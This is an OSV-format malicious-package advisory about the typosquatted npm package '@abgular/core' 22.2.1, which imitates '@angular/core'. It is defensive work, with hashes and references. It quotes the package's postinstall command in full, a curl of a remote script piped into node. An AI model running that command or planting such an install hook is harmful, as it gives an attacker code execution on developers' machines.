{"id":"MAL-2026-17532","summary":"Malicious code in @abgular/core (npm)","details":"\n---\n_-= Per source details. Do not edit below this line.=-_\n\n## Source: amazon-inspector (4c4c8470613dc3a49e249f1a9f91bc756bb9b4323c78268b35816f07e78a0a9b)\nPackage name `@abgular/core` is a single-character transposition of `@angular/core` and copies that package's description, author, and repository metadata. The package.json declares a `postinstall` script that runs `curl -L https://web.archive.org/web/https://gitflic.ru/project/hellscripter/install-scripts/blob/raw?file=node.js | node`, fetching an unpinned, unverified JavaScript payload from a third-party code-hosting service via web.archive.org and piping it directly into `node` during `npm install`. The fetched code executes on the installer's machine with the installer's privileges; its contents are mutable and attacker-controlled. The deceptive package identity ensures developers who mistype `@angular/core` trigger this remote-code execution.\n","modified":"2026-10-05T04:15:06.412304457Z","published":"2026-10-05T03:32:45Z","database_specific":{"malicious-packages-origins":[{"id":"IN-MAL-2026-020996","import_time":"2026-10-05T03:57:37.538165932Z","modified_time":"2026-10-05T03:32:45Z","sha256":"4c4c8470613dc3a49e249f1a9f91bc756bb9b4323c78268b35816f07e78a0a9b","source":"amazon-inspector","versions":["22.2.1"]}]},"references":[{"type":"PACKAGE","url":"https://www.npmjs.com/package/@abgular/core/v/22.2.1"}],"affected":[{"package":{"name":"@abgular/core","ecosystem":"npm","purl":"pkg:npm/%40abgular/core"},"versions":["22.2.1"],"database_specific":{"cwes":[{"cweId":"CWE-506","description":"The product contains code that appears to be malicious in nature.","name":"Embedded Malicious Code"}],"indicators":{"evidence_files":[{"path":"package.json","sha256":"31a8674db6d0ab266569e2838e029846a2e16c16d2f843b586ebea980cfb1125","tlsh":"fb513724e4f48d6323df6254dd2a4943b138495b5c38bd68b3dd009c8f0e61f21beb9a"}],"package_integrity":[{"filename":"core-22.2.1.tgz","hashes":{"sha1":"7968206bad0a9defaa07d44f0dda0c288948d08e","sha512_sri":"sha512-8iv+GvvLmZjcOVOJk3fYIu5dse4ooZRrCxOCv/c87KYzz2CEoqiWXBE1ejDR12f/z6X6vnxeG8pT1ZlyMsTP7Q=="}}]},"source":"https://github.com/ossf/malicious-packages/blob/main/osv/malicious/npm/@abgular/core/MAL-2026-17532.json"}}],"schema_version":"1.9.0","credits":[{"name":"Amazon Inspector","contact":["inspector-research@amazon.com"],"type":"FINDER"}]}